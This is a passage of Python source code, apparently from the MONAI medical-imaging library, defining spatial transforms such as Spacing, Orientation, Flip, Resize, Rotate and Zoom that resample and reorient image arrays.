            if allclose(dst_r, dst_affine, atol=AFFINE_TOL) and allclose(spatial_size, in_spatial_size):
                # simple reorientation achieves the desired affine
                spatial_ornt[:, 0] += 1
                spatial_ornt = np.concatenate([np.array([[0, 1]]), spatial_ornt])
                img_ = nib.orientations.apply_orientation(img, spatial_ornt)
                output_data, *_ = convert_to_dst_type(img_, img, dtype=torch.float32)
                return output_data, dst_affine
        # relative transform between the two coordinate frames:
        # xform = src_affine^{-1} @ dst_affine
        try:
            src_affine, *_ = convert_to_dst_type(src_affine, dst_affine)
            if isinstance(src_affine, np.ndarray):
                xform = np.linalg.solve(src_affine, dst_affine)
            else:
                xform = (
                    torch.linalg.solve(src_affine, dst_affine)
                    if pytorch_after(1, 8, 0)
                    else torch.solve(dst_affine, src_affine).solution  # type: ignore
                )
        except (np.linalg.LinAlgError, RuntimeError) as e:
            raise ValueError(f"src affine is not invertible: {src_affine}") from e
        xform = to_affine_nd(spatial_rank, xform)
        # no resampling if it's identity transform
        if allclose(xform, np.diag(np.ones(len(xform))), atol=AFFINE_TOL) and allclose(spatial_size, in_spatial_size):
            output_data, *_ = convert_to_dst_type(img, img, dtype=torch.float32)
            return output_data, dst_affine
        _dtype = dtype or self.dtype or img.dtype
        in_spatial_size = in_spatial_size.tolist()
        chns, additional_dims = img.shape[0], img.shape[spatial_rank + 1 :]  # beyond three spatial dims
        # resample
        img_ = convert_data_type(img, torch.Tensor, dtype=_dtype)[0]
        xform = convert_to_dst_type(xform, img_)[0]
        align_corners = self.align_corners if align_corners is None else align_corners
        mode = mode or self.mode
        padding_mode = padding_mode or self.padding_mode
        if additional_dims:
            # fold dims beyond the third spatial dim into the channel dim for resampling
            xform_shape = [-1] + in_spatial_size
            img_ = img_.reshape(xform_shape)
        if align_corners:
            _t_r = torch.diag(torch.ones(len(xform), dtype=xform.dtype, device=xform.device))  # type: ignore
            for idx, d_dst in enumerate(spatial_size[:spatial_rank]):
                _t_r[idx, -1] = (max(d_dst, 2) - 1.0) / 2.0
            xform = xform @ _t_r
            if not USE_COMPILED:
                _t_l = normalize_transform(
                    in_spatial_size, xform.device, xform.dtype, align_corners=True  # type: ignore
                )
                xform = _t_l @ xform  # type: ignore
            affine_xform = Affine(
                affine=xform, spatial_size=spatial_size, norm_coords=False, image_only=True, dtype=_dtype
            )
            output_data = affine_xform(img_, mode=mode, padding_mode=padding_mode)
        else:
            affine_xform = AffineTransform(
                normalized=False,
                mode=mode,
                padding_mode=padding_mode,
                align_corners=align_corners,
                reverse_indexing=True,
            )
            output_data = affine_xform(img_.unsqueeze(0), theta=xform, spatial_size=spatial_size).squeeze(0)
        if additional_dims:
            # restore the dims that were folded into the channel dim above
            full_shape = (chns, *spatial_size, *additional_dims)
            output_data = output_data.reshape(full_shape)
        # output dtype float
        output_data, *_ = convert_to_dst_type(output_data, img, dtype=torch.float32)
        return output_data, dst_affine
class ResampleToMatch(SpatialResample):
    """Resample an image to match given meta data. The affine matrix will be aligned,
    and the size of the output image will match."""
    def __call__(  # type: ignore
        self,
        img: NdarrayOrTensor,
        src_meta: Optional[Dict] = None,
        dst_meta: Optional[Dict] = None,
        mode: Union[GridSampleMode, str, None] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str, None] = GridSamplePadMode.BORDER,
        align_corners: Optional[bool] = False,
        dtype: DtypeLike = None,
    ):
        """Resample ``img`` so its affine and spatial shape match ``dst_meta``.
        Returns the resampled image and a copy of ``dst_meta`` whose ``affine``
        entry is replaced by the affine actually produced by the resampling.
        """
        # both metadata dictionaries are mandatory
        if src_meta is None:
            raise RuntimeError("`in_meta` is missing")
        if dst_meta is None:
            raise RuntimeError("`out_meta` is missing")
        # per-call arguments fall back to the values configured at construction
        resampled, updated_affine = super().__call__(
            img=img,
            src_affine=src_meta.get("affine"),
            dst_affine=dst_meta.get("affine"),
            spatial_size=dst_meta.get("spatial_shape"),
            mode=mode or self.mode,
            padding_mode=padding_mode or self.padding_mode,
            align_corners=self.align_corners if align_corners is None else align_corners,
            dtype=dtype or self.dtype,
        )
        # do not mutate the caller's metadata; return an updated copy instead
        out_meta = deepcopy(dst_meta)
        out_meta["affine"] = updated_affine
        return resampled, out_meta
class Spacing(Transform):
    """
    Resample input image into the specified `pixdim`.
    """
    backend = SpatialResample.backend
    def __init__(
        self,
        pixdim: Union[Sequence[float], float, np.ndarray],
        diagonal: bool = False,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        align_corners: bool = False,
        dtype: DtypeLike = np.float64,
        image_only: bool = False,
    ) -> None:
        """
        Args:
            pixdim: output voxel spacing. if providing a single number, will use it for the first dimension.
                items of the pixdim sequence map to the spatial dimensions of input image, if length
                of pixdim sequence is longer than image spatial dimensions, will ignore the longer part,
                if shorter, will pad with `1.0`.
                if the components of the `pixdim` are non-positive values, the transform will use the
                corresponding components of the original pixdim, which is computed from the `affine`
                matrix of input image.
            diagonal: whether to resample the input to have a diagonal affine matrix.
                If True, the input data is resampled to the following affine::
                    np.diag((pixdim_0, pixdim_1, ..., pixdim_n, 1))
                This effectively resets the volume to the world coordinate system (RAS+ in nibabel).
                The original orientation, rotation, shearing are not preserved.
                If False, this transform preserves the axes orientation, orthogonal rotation and
                translation components from the original affine. This option will not flip/swap axes
                of the original data.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
                When `USE_COMPILED` is `True`, this argument uses
                ``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
                See also: https://docs.monai.io/en/stable/networks.html#grid-pull
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            align_corners: Geometrically, we consider the pixels of the input as squares rather than points.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            dtype: data type for resampling computation. Defaults to ``np.float64`` for best precision.
                If None, use the data type of input data. To be compatible with other modules,
                the output data type is always ``np.float32``.
            image_only: return just the image or the image, the old affine and new affine. Default is `False`.
        """
        self.pixdim = np.array(ensure_tuple(pixdim), dtype=np.float64)
        self.diagonal = diagonal
        self.image_only = image_only
        # the actual resampling is delegated to SpatialResample
        self.sp_resample = SpatialResample(
            mode=look_up_option(mode, GridSampleMode),
            padding_mode=look_up_option(padding_mode, GridSamplePadMode),
            align_corners=align_corners,
            dtype=dtype,
        )
    def __call__(
        self,
        data_array: NdarrayOrTensor,
        affine: Optional[NdarrayOrTensor] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        align_corners: Optional[bool] = None,
        dtype: DtypeLike = None,
        output_spatial_shape: Optional[Union[Sequence[int], np.ndarray, int]] = None,
    ) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor, NdarrayOrTensor]]:
        """
        Args:
            data_array: in shape (num_channels, H[, W, ...]).
            affine (matrix): (N+1)x(N+1) original affine matrix for spatially ND `data_array`. Defaults to identity.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``self.mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
                When `USE_COMPILED` is `True`, this argument uses
                ``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
                See also: https://docs.monai.io/en/stable/networks.html#grid-pull
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``self.padding_mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            align_corners: Geometrically, we consider the pixels of the input as squares rather than points.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            dtype: data type for resampling computation. Defaults to ``self.dtype``.
                If None, use the data type of input data. To be compatible with other modules,
                the output data type is always ``np.float32``.
            output_spatial_shape: specify the shape of the output data_array. This is typically useful for
                the inverse of `Spacingd` where sometimes we could not compute the exact shape due to the quantization
                error with the affine.
        Raises:
            ValueError: When ``data_array`` has no spatial dimensions.
            ValueError: When ``pixdim`` is nonpositive.
        Returns:
            data_array (resampled into `self.pixdim`), original affine, current affine.
        """
        sr = int(data_array.ndim - 1)
        if sr <= 0:
            raise ValueError("data_array must have at least one spatial dimension.")
        if affine is None:
            # default to identity
            affine_np = affine = np.eye(sr + 1, dtype=np.float64)
            affine_ = np.eye(sr + 1, dtype=np.float64)
        else:
            affine_np, *_ = convert_data_type(affine, np.ndarray)
            affine_ = to_affine_nd(sr, affine_np)
        out_d = self.pixdim[:sr]
        if out_d.size < sr:
            # pad missing pixdim entries with 1.0 so every spatial dim has a spacing
            out_d = np.append(out_d, [1.0] * (sr - out_d.size))
        # compute output affine, shape and offset
        new_affine = zoom_affine(affine_, out_d, diagonal=self.diagonal)
        output_shape, offset = compute_shape_offset(data_array.shape[1:], affine_, new_affine)
        # shift the new affine so the original field of view is preserved
        new_affine[:sr, -1] = offset[:sr]
        output_data, new_affine = self.sp_resample(
            data_array,
            src_affine=affine,
            dst_affine=new_affine,
            spatial_size=list(output_shape) if output_spatial_shape is None else output_spatial_shape,
            mode=mode,
            padding_mode=padding_mode,
            align_corners=align_corners,
            dtype=dtype,
        )
        # return the new affine in the caller's array/tensor type
        new_affine = to_affine_nd(affine_np, new_affine)
        new_affine, *_ = convert_to_dst_type(src=new_affine, dst=affine, dtype=torch.float32)
        if self.image_only:
            return output_data
        return output_data, affine, new_affine
class Orientation(Transform):
    """
    Change the input image's orientation into the specified based on `axcodes`.
    """

    backend = [TransformBackends.NUMPY, TransformBackends.TORCH]

    def __init__(
        self,
        axcodes: Optional[str] = None,
        as_closest_canonical: bool = False,
        labels: Optional[Sequence[Tuple[str, str]]] = tuple(zip("LPI", "RAS")),
        image_only: bool = False,
    ) -> None:
        """
        Args:
            axcodes: N elements sequence for spatial ND input's orientation.
                e.g. axcodes='RAS' represents 3D orientation:
                (Left, Right), (Posterior, Anterior), (Inferior, Superior).
                default orientation labels options are: 'L' and 'R' for the first dimension,
                'P' and 'A' for the second, 'I' and 'S' for the third.
            as_closest_canonical: if True, load the image as closest to canonical axis format.
            labels: optional, None or sequence of (2,) sequences
                (2,) sequences are labels for (beginning, end) of output axis.
                Defaults to ``(('L', 'R'), ('P', 'A'), ('I', 'S'))``.
            image_only: if True return only the image volume, otherwise return (image, affine, new_affine).
        Raises:
            ValueError: When ``axcodes=None`` and ``as_closest_canonical=False``. Incompatible values.
        See Also: `nibabel.orientations.ornt2axcodes`.
        """
        if axcodes is None and not as_closest_canonical:
            # no target orientation given and canonical reorientation not requested: nothing to do.
            # NOTE: the message previously said "as_closest_canonical=True", the opposite of the
            # condition actually checked here.
            raise ValueError("Incompatible values: axcodes=None and as_closest_canonical=False.")
        if axcodes is not None and as_closest_canonical:
            warnings.warn("using as_closest_canonical=True, axcodes ignored.")
        self.axcodes = axcodes
        self.as_closest_canonical = as_closest_canonical
        self.labels = labels
        self.image_only = image_only

    def __call__(
        self, data_array: NdarrayOrTensor, affine: Optional[NdarrayOrTensor] = None
    ) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor, NdarrayOrTensor]]:
        """
        original orientation of `data_array` is defined by `affine`.
        Args:
            data_array: in shape (num_channels, H[, W, ...]).
            affine (matrix): (N+1)x(N+1) original affine matrix for spatially ND `data_array`. Defaults to identity.
        Raises:
            ValueError: When ``data_array`` has no spatial dimensions.
            ValueError: When ``axcodes`` spatiality differs from ``data_array``.
        Returns:
            data_array [reoriented in `self.axcodes`] if `self.image_only`, else
            (data_array [reoriented in `self.axcodes`], original axcodes, current axcodes).
        """
        spatial_shape = data_array.shape[1:]
        sr = len(spatial_shape)
        if sr <= 0:
            raise ValueError("data_array must have at least one spatial dimension.")
        affine_: np.ndarray
        if affine is None:
            # default to identity
            affine_np = affine = np.eye(sr + 1, dtype=np.float64)
            affine_ = np.eye(sr + 1, dtype=np.float64)
        else:
            affine_np, *_ = convert_data_type(affine, np.ndarray)
            affine_ = to_affine_nd(sr, affine_np)
        src = nib.io_orientation(affine_)
        if self.as_closest_canonical:
            spatial_ornt = src
        else:
            if self.axcodes is None:
                # unreachable when constructed via __init__, but guards direct attribute edits.
                raise ValueError("Incompatible values: axcodes=None and as_closest_canonical=False.")
            if sr < len(self.axcodes):
                warnings.warn(
                    f"axcodes ('{self.axcodes}') length is smaller than the number of input spatial dimensions D={sr}.\n"
                    f"{self.__class__.__name__}: input spatial shape is {spatial_shape}, num. channels is {data_array.shape[0]},"
                    "please make sure the input is in the channel-first format."
                )
            dst = nib.orientations.axcodes2ornt(self.axcodes[:sr], labels=self.labels)
            if len(dst) < sr:
                raise ValueError(
                    f"axcodes must match data_array spatially, got axcodes={len(self.axcodes)}D data_array={sr}D"
                )
            spatial_ornt = nib.orientations.ornt_transform(src, dst)
        new_affine = affine_ @ nib.orientations.inv_ornt_aff(spatial_ornt, spatial_shape)
        _is_tensor = isinstance(data_array, torch.Tensor)
        # shift orientation rows past the channel dim, then prepend an identity row for it
        spatial_ornt[:, 0] += 1  # skip channel dim
        spatial_ornt = np.concatenate([np.array([[0, 1]]), spatial_ornt])
        # flip every axis whose direction is reversed in the target orientation
        axes = [ax for ax, flip in enumerate(spatial_ornt[:, 1]) if flip == -1]
        if axes:
            data_array = (
                torch.flip(data_array, dims=axes) if _is_tensor else np.flip(data_array, axis=axes)  # type: ignore
            )
        # permute axes into the target order (identity permutation is skipped)
        full_transpose = np.arange(len(data_array.shape))
        full_transpose[: len(spatial_ornt)] = np.argsort(spatial_ornt[:, 0])
        if not np.all(full_transpose == np.arange(len(data_array.shape))):
            if _is_tensor:
                data_array = data_array.permute(full_transpose.tolist())  # type: ignore
            else:
                data_array = data_array.transpose(full_transpose)  # type: ignore
        out, *_ = convert_to_dst_type(src=data_array, dst=data_array)
        new_affine = to_affine_nd(affine_np, new_affine)
        new_affine, *_ = convert_to_dst_type(src=new_affine, dst=affine, dtype=torch.float32)
        if self.image_only:
            return out
        return out, affine, new_affine
class Flip(Transform):
    """
    Reverses the order of elements along the given spatial axis. Preserves shape.
    Uses ``np.flip`` in practice. See numpy.flip for additional details:
    https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html.

    Args:
        spatial_axis: spatial axes along which to flip over. Default is None.
            The default `axis=None` will flip over all of the axes of the input array.
            If axis is negative it counts from the last to the first axis.
            If axis is a tuple of ints, flipping is performed on all of the axes
            specified in the tuple.
    """

    backend = [TransformBackends.TORCH, TransformBackends.NUMPY]

    def __init__(self, spatial_axis: Optional[Union[Sequence[int], int]] = None) -> None:
        self.spatial_axis = spatial_axis

    def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
        """
        Args:
            img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
        """
        # translate spatial axes into absolute array axes (channel dim excluded)
        flip_axes = map_spatial_axes(img.ndim, self.spatial_axis)
        if isinstance(img, torch.Tensor):
            return torch.flip(img, flip_axes)
        # np.flip returns a non-contiguous view; materialize it for downstream consumers
        return np.ascontiguousarray(np.flip(img, flip_axes))
class Resize(Transform):
    """
    Resize the input image to given spatial size (with scaling, not cropping/padding).
    Implemented using :py:class:`torch.nn.functional.interpolate`.
    Args:
        spatial_size: expected shape of spatial dimensions after resize operation.
            if some components of the `spatial_size` are non-positive values, the transform will use the
            corresponding components of img size. For example, `spatial_size=(32, -1)` will be adapted
            to `(32, 64)` if the second spatial dimension size of img is `64`.
        size_mode: should be "all" or "longest", if "all", will use `spatial_size` for all the spatial dims,
            if "longest", rescale the image so that only the longest side is equal to specified `spatial_size`,
            which must be an int number in this case, keeping the aspect ratio of the initial image, refer to:
            https://albumentations.ai/docs/api_reference/augmentations/geometric/resize/
            #albumentations.augmentations.geometric.resize.LongestMaxSize.
        mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
            The interpolation mode. Defaults to ``"area"``.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
        align_corners: This only has an effect when mode is
            'linear', 'bilinear', 'bicubic' or 'trilinear'. Default: None.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
    """
    backend = [TransformBackends.TORCH]
    def __init__(
        self,
        spatial_size: Union[Sequence[int], int],
        size_mode: str = "all",
        mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
        align_corners: Optional[bool] = None,
    ) -> None:
        self.size_mode = look_up_option(size_mode, ["all", "longest"])
        self.spatial_size = spatial_size
        self.mode: InterpolateMode = look_up_option(mode, InterpolateMode)
        self.align_corners = align_corners
    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[InterpolateMode, str]] = None,
        align_corners: Optional[bool] = None,
    ) -> NdarrayOrTensor:
        """
        Args:
            img: channel first array, must have shape: (num_channels, H[, W, ..., ]).
            mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
                The interpolation mode. Defaults to ``self.mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
            align_corners: This only has an effect when mode is
                'linear', 'bilinear', 'bicubic' or 'trilinear'. Defaults to ``self.align_corners``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
        Raises:
            ValueError: When ``self.spatial_size`` length is less than ``img`` spatial dimensions.
        """
        # interpolate requires a float torch tensor; convert back to the input type at the end
        img_, *_ = convert_data_type(img, torch.Tensor, dtype=torch.float)
        if self.size_mode == "all":
            input_ndim = img_.ndim - 1  # spatial ndim
            output_ndim = len(ensure_tuple(self.spatial_size))
            if output_ndim > input_ndim:
                # pad trailing singleton dims so the image rank matches the requested size
                input_shape = ensure_tuple_size(img_.shape, output_ndim + 1, 1)
                img_ = img_.reshape(input_shape)
            elif output_ndim < input_ndim:
                raise ValueError(
                    "len(spatial_size) must be greater or equal to img spatial dimensions, "
                    f"got spatial_size={output_ndim} img={input_ndim}."
                )
            # non-positive entries in spatial_size fall back to the corresponding input size
            spatial_size_ = fall_back_tuple(self.spatial_size, img_.shape[1:])
        else:  # for the "longest" mode
            img_size = img_.shape[1:]
            if not isinstance(self.spatial_size, int):
                raise ValueError("spatial_size must be an int number if size_mode is 'longest'.")
            # uniform scale so the longest spatial side becomes exactly spatial_size
            scale = self.spatial_size / max(img_size)
            spatial_size_ = tuple(int(round(s * scale)) for s in img_size)
        # interpolate expects a batch dim: add it for the call, strip it afterwards
        resized = torch.nn.functional.interpolate(
            input=img_.unsqueeze(0),
            size=spatial_size_,
            mode=look_up_option(self.mode if mode is None else mode, InterpolateMode).value,
            align_corners=self.align_corners if align_corners is None else align_corners,
        )
        out, *_ = convert_to_dst_type(resized.squeeze(0), img)
        return out
class Rotate(Transform, ThreadUnsafe):
    """
    Rotates an input image by given angle using :py:class:`monai.networks.layers.AffineTransform`.
    Args:
        angle: Rotation angle(s) in radians. should be a float for 2D, three floats for 3D.
        keep_size: If it is True, the output shape is kept the same as the input.
            If it is False, the output shape is adapted so that the
            input array is contained completely in the output. Default is True.
        mode: {``"bilinear"``, ``"nearest"``}
            Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
        padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
            Padding mode for outside grid values. Defaults to ``"border"``.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
        align_corners: Defaults to False.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
        dtype: data type for resampling computation. Defaults to ``np.float32``.
            If None, use the data type of input data. To be compatible with other modules,
            the output data type is always ``np.float32``.
    """
    backend = [TransformBackends.TORCH]
    def __init__(
        self,
        angle: Union[Sequence[float], float],
        keep_size: bool = True,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        align_corners: bool = False,
        dtype: Union[DtypeLike, torch.dtype] = np.float32,
    ) -> None:
        self.angle = angle
        self.keep_size = keep_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
        self.align_corners = align_corners
        self.dtype = dtype
        # most recently applied rotation matrix; makes this transform thread-unsafe
        self._rotation_matrix: Optional[NdarrayOrTensor] = None
    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        align_corners: Optional[bool] = None,
        dtype: Union[DtypeLike, torch.dtype] = None,
    ) -> NdarrayOrTensor:
        """
        Args:
            img: channel first array, must have shape: [chns, H, W] or [chns, H, W, D].
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``self.mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``self.padding_mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            align_corners: Defaults to ``self.align_corners``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            dtype: data type for resampling computation. Defaults to ``self.dtype``.
                If None, use the data type of input data. To be compatible with other modules,
                the output data type is always ``np.float32``.
        Raises:
            ValueError: When ``img`` spatially is not one of [2D, 3D].
        """
        _dtype = dtype or self.dtype or img.dtype
        img_t, *_ = convert_data_type(img, torch.Tensor, dtype=_dtype)
        im_shape = np.asarray(img_t.shape[1:])  # spatial dimensions
        input_ndim = len(im_shape)
        if input_ndim not in (2, 3):
            raise ValueError(f"Unsupported img dimension: {input_ndim}, available options are [2, 3].")
        # 2D rotations take a single angle, 3D rotations take one per axis
        _angle = ensure_tuple_rep(self.angle, 1 if input_ndim == 2 else 3)
        transform = create_rotate(input_ndim, _angle)
        # translation that moves the input center to the origin (rotation is about the origin)
        shift = create_translate(input_ndim, ((im_shape - 1) / 2).tolist())
        if self.keep_size:
            output_shape = im_shape
        else:
            # rotate the corner points of the input bounding box and take their extent
            corners = np.asarray(np.meshgrid(*[(0, dim) for dim in im_shape], indexing="ij")).reshape(
                (len(im_shape), -1)
            )
            corners = transform[:-1, :-1] @ corners  # type: ignore
            output_shape = np.asarray(corners.ptp(axis=1) + 0.5, dtype=int)
        # translation back from the origin to the output center; full transform is
        # center-to-origin -> rotate -> origin-to-center (applied right to left)
        shift_1 = create_translate(input_ndim, (-(output_shape - 1) / 2).tolist())
        transform = shift @ transform @ shift_1
        transform_t, *_ = convert_to_dst_type(transform, img_t)
        xform = AffineTransform(
            normalized=False,
            mode=look_up_option(mode or self.mode, GridSampleMode),
            padding_mode=look_up_option(padding_mode or self.padding_mode, GridSamplePadMode),
            align_corners=self.align_corners if align_corners is None else align_corners,
            reverse_indexing=True,
        )
        output: torch.Tensor = xform(img_t.unsqueeze(0), transform_t, spatial_size=output_shape).float().squeeze(0)
        self._rotation_matrix = transform
        out: NdarrayOrTensor
        out, *_ = convert_to_dst_type(output, dst=img, dtype=output.dtype)
        return out
    def get_rotation_matrix(self) -> Optional[NdarrayOrTensor]:
        """
        Get the most recently applied rotation matrix
        This is not thread-safe.
        """
        return self._rotation_matrix
class Zoom(Transform):
    """
    Zooms an ND image using :py:class:`torch.nn.functional.interpolate`.
    For details, please see https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html.
    Different from :py:class:`monai.transforms.resize`, this transform takes scaling factors
    as input, and provides an option of preserving the input spatial size.
    Args:
        zoom: The zoom factor along the spatial axes.
            If a float, zoom is the same for each spatial axis.
            If a sequence, zoom should contain one value for each spatial axis.
        mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
            The interpolation mode. Defaults to ``"area"``.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
        padding_mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``,
            ``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``}
            available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}.
            One of the listed string values or a user supplied function. Defaults to ``"edge"``.
            The mode to pad data after zooming.
            See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html
            https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html
        align_corners: This only has an effect when mode is
            'linear', 'bilinear', 'bicubic' or 'trilinear'. Default: None.
            See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
        keep_size: Should keep original size (padding/slicing if needed), default is True.
        kwargs: other arguments for the `np.pad` or `torch.pad` function.
            note that `np.pad` treats channel dimension as the first dimension.
    """
    backend = [TransformBackends.TORCH]
    def __init__(
        self,
        zoom: Union[Sequence[float], float],
        mode: Union[InterpolateMode, str] = InterpolateMode.AREA,
        padding_mode: Union[NumpyPadMode, PytorchPadMode, str] = NumpyPadMode.EDGE,
        align_corners: Optional[bool] = None,
        keep_size: bool = True,
        **kwargs,
    ) -> None:
        self.zoom = zoom
        self.mode: InterpolateMode = InterpolateMode(mode)
        self.padding_mode = padding_mode
        self.align_corners = align_corners
        self.keep_size = keep_size
        self.kwargs = kwargs
    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[InterpolateMode, str]] = None,
        padding_mode: Optional[Union[NumpyPadMode, PytorchPadMode, str]] = None,
        align_corners: Optional[bool] = None,
    ) -> NdarrayOrTensor:
        """
        Args:
            img: channel first array, must have shape: (num_channels, H[, W, ..., ]).
            mode: {``"nearest"``, ``"linear"``, ``"bilinear"``, ``"bicubic"``, ``"trilinear"``, ``"area"``}
                The interpolation mode. Defaults to ``self.mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
            padding_mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``,
                ``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``}
                available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}.
                One of the listed string values or a user supplied function. Defaults to ``self.padding_mode``.
                The mode to pad data after zooming.
                See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html
                https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html
            align_corners: This only has an effect when mode is
                'linear', 'bilinear', 'bicubic' or 'trilinear'. Defaults to ``self.align_corners``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.interpolate.html
        """
        # interpolate requires a float torch tensor; convert back to the input type at the end
        img_t, *_ = convert_data_type(img, torch.Tensor, dtype=torch.float32)
        _zoom = ensure_tuple_rep(self.zoom, img.ndim - 1)  # match the spatial image dim
        # interpolate expects a batch dim: add it for the call, strip it afterwards
        zoomed: NdarrayOrTensor = torch.nn.functional.interpolate(  # type: ignore
            recompute_scale_factor=True,
            input=img_t.unsqueeze(0),
            scale_factor=list(_zoom),
            mode=look_up_option(self.mode if mode is None else mode, InterpolateMode).value,
            align_corners=self.align_corners if align_corners is None else align_corners,
        )
        zoomed = zoomed.squeeze(0)
        if self.keep_size and not np.allclose(img_t.shape, zoomed.shape):
            # restore the original shape: pad where the result shrank, center-crop where it grew
            pad_vec = [(0, 0)] * len(img_t.shape)
            slice_vec = [slice(None)] * len(img_t.shape)
            for idx, (od, zd) in enumerate(zip(img_t.shape, zoomed.shape)):
                diff = od - zd
                half = abs(diff) // 2
                if diff > 0:  # need padding
                    pad_vec[idx] = (half, diff - half)
                elif diff < 0:  # need slicing
                    slice_vec[idx] = slice(half, half + od)
            padder = Pad(pad_vec, padding_mode or self.padding_mode)
            zoomed = padder(zoomed)
            zoomed = zoomed[tuple(slice_vec)]
        out, *_ = convert_to_dst_type(zoomed, dst=img)
        return out
class Rotate90(Transform):
    """
    Rotate an array by 90 degrees in the plane specified by `axes`.
    See np.rot90 for additional details:
    https://numpy.org/doc/stable/reference/generated/numpy.rot90.html.
    """

    backend = [TransformBackends.TORCH, TransformBackends.NUMPY]

    def __init__(self, k: int = 1, spatial_axes: Tuple[int, int] = (0, 1)) -> None:
        """
        Args:
            k: number of times to rotate by 90 degrees.
            spatial_axes: 2 int numbers, defines the plane to rotate with 2 spatial axes.
                Default: (0, 1), this is the first two axis in spatial dimensions.
                If axis is negative it counts from the last to the first axis.
        """
        self.k = k
        axes: Tuple[int, int] = ensure_tuple(spatial_axes)  # type: ignore
        if len(axes) != 2:
            raise ValueError("spatial_axes must be 2 int numbers to indicate the axes to rotate 90 degrees.")
        self.spatial_axes = axes

    def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
        """
        Args:
            img: channel first array, must have shape: (num_channels, H[, W, ..., ]),
        """
        # translate the requested spatial plane into absolute array axes (channel dim excluded)
        plane = map_spatial_axes(img.ndim, self.spatial_axes)
        if isinstance(img, torch.Tensor):
            rotated: NdarrayOrTensor = torch.rot90(img, self.k, plane)
        else:
            rotated = np.rot90(img, self.k, plane)
        # np.rot90 may return a view; also restore the input dtype
        rotated, *_ = convert_data_type(rotated, dtype=img.dtype)
        return rotated
class RandRotate90(RandomizableTransform):
    """
    With probability `prob`, input arrays are rotated by 90 degrees
    in the plane specified by `spatial_axes`.
    """

    backend = Rotate90.backend

